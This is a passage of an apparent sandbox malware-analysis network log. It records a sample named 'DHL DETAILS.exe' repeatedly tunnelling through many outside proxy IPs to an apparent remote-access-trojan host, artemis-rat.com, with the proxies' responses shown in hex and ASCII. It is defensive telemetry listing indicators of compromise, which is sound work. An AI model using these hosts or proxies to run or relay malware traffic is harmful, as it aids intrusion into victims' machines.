                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1211192.168.2.5537198.219.135.234436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.707118034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1212192.168.2.5537218.219.135.234436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.707808971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1213192.168.2.5537238.219.135.234436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.708467960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1214192.168.2.55362145.196.150.19554326352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.709613085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.928982019 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Content-Length: 65
                                                                                    Proxy-Authenticate: Basic realm="Proxy"
                                                                                    Connection: close
                                                                                    Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                    Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1215192.168.2.55327480.67.8.6806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.711671114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1216192.168.2.55350543.155.142.116156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.715804100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1217192.168.2.55327394.30.152.172806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.717487097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1218192.168.2.551823192.163.201.131408866352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.725249052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.833201885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1219192.168.2.5535403.122.84.9931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.725368977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.032854080 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1220192.168.2.55171367.227.186.23576766352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.751034975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.833148003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1221192.168.2.55350960.190.68.15473026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.751419067 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:18.091655970 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1222192.168.2.55355854.38.179.162566136352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.751451969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1223192.168.2.553532202.162.219.1010806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.775351048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1224192.168.2.553604195.154.172.16131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.779618025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1225192.168.2.55355947.122.45.22131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.785034895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.135713100 CET711INHTTP/1.1 502 Bad Gateway
                                                                                    Server: nginx/1.24.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 559
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.24.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1226192.168.2.5535708.213.128.9066666352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.791341066 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1227192.168.2.55350038.54.116.931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.791341066 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:20.198071003 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:22.251873970 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:24.847807884 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:29.711780071 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1228192.168.2.553619175.213.76.24806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.799031019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1229192.168.2.553568138.36.150.1610806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.818443060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1230192.168.2.553623121.164.200.1810806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.818820953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1231192.168.2.553562103.231.78.36806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.830537081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1232192.168.2.553666185.162.229.112806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.838165045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.994396925 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1233192.168.2.553681185.162.231.254806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.876317978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.030961037 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1234192.168.2.551789193.30.13.139996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.876319885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.868494034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1235192.168.2.553571202.150.1.87806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.876491070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1236192.168.2.553629119.28.4.11299996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.876496077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1237192.168.2.553704104.21.80.83806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.876552105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.031205893 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1238192.168.2.553646130.162.213.17580806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.902762890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.220717907 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1239192.168.2.553565140.238.245.11681006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.902847052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.108645916 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1240192.168.2.553738104.17.9.114806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.912478924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.066945076 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1241192.168.2.553730185.162.230.178806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.912530899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.068239927 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
